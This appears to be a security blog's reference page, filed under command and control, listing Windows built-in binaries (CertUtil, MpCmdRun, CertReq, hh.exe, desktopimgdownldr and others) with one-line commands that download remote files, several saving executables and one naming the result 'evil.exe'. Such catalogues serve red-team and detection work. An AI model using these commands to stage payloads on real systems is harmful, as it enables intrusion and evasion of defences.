The Void 🌌

Download External Files

Jul 11, 20252 min read

Secondary Categories: 02 - Command and Control

AppInstaller

Path:

  • C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
start ms-appinstaller://?source=https://www.example.org/file.exe

Curl

Download the file locally

curl https://www.digitalocean.com/robots.txt

Download with specific file name

curl -o do-bots.txt  https://www.digitalocean.com/robots.txt

Download and follow redirects

curl -I www.digitalocean.com/robots.txt

Download with basic authentication

curl -u username:password -O https://example.com/securefile.zip
curl -H "Authorization: Bearer YOUR_TOKEN" -O https://api.example.com/protected/data.json

CertOC

Path:

  • c:\windows\system32\certoc.exe
  • c:\windows\syswow64\certoc.exe
certoc.exe -GetCACAPS https://www.example.org/file.ps1

CertReq

Path:

  • C:\Windows\System32\certreq.exe
  • C:\Windows\SysWOW64\certreq.exe
CertReq -Post -config https://www.example.org/file.ext C:\Windows\Temp\file.ext file.txt

CertUtil

Path:

  • C:\Windows\System32\certutil.exe
  • C:\Windows\SysWOW64\certutil.exe

Download and save to disk

certutil.exe -urlcache -f https://www.example.org/file.exe file.exe

Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.

certutil.exe -verifyctl -f https://www.example.org/file.exe file.exe

Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].

certutil.exe -URL https://www.example.org/file.exe

Cmdl32

Path:

  • C:\Windows\System32\cmdl32.exe
  • C:\Windows\SysWOW64\cmdl32.exe
cmdl32 /vpn /lan %cd%\config

ConfigSecurityPolicy

Path:

  • C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
ConfigSecurityPolicy.exe https://www.example.org/file.ext

Desktopimgdownldr

Path:

  • c:\windows\system32\desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://www.example.org/file.ext /eventName:desktopimgdownldr

Hh.exe

Path:

  • C:\Windows\hh.exe
  • C:\Windows\SysWOW64\hh.exe
HH.exe https://www.example.org/file.bat

IMEWDBLD

Path:

  • C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://www.example.org/file.ext

Ldifde

Path:

  • c:\windows\system32\ldifde.exe
  • c:\windows\syswow64\ldifde.exe
Ldifde -i -f file.ldf

MpCmdRun

Path:

  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
  • C:\Program Files\Windows Defender\MpCmdRun.exe
  • C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://www.example.org/file.exe -path C:\Users\Public\Downloads\evil.exe
MpCmdRun.exe -DownloadFile -url https://www.example.org/file.exe -path C:\Windows\Temp\file.exe

MsoHtmEd

Path:

  • C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
MsoHtmEd.exe https://www.example.org/file.ext

ProtocolHandler

Path:

  • C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
ProtocolHandler.exe https://www.example.org/file.ext

Powershell

Invoke-WebRequest -URI $URL -OutFile $Path
(New-Object System.Net.WebClient).DownloadFile ($URL, $Path)
Start-BitsTransfer -Source $URL -Destination $Path

Resources:

TitleURL
LOLBinshttps://lolbas-project.github.io/#

Graph View

Backlinks

  • No backlinks found

Recent Blog Posts

Recent Blog Posts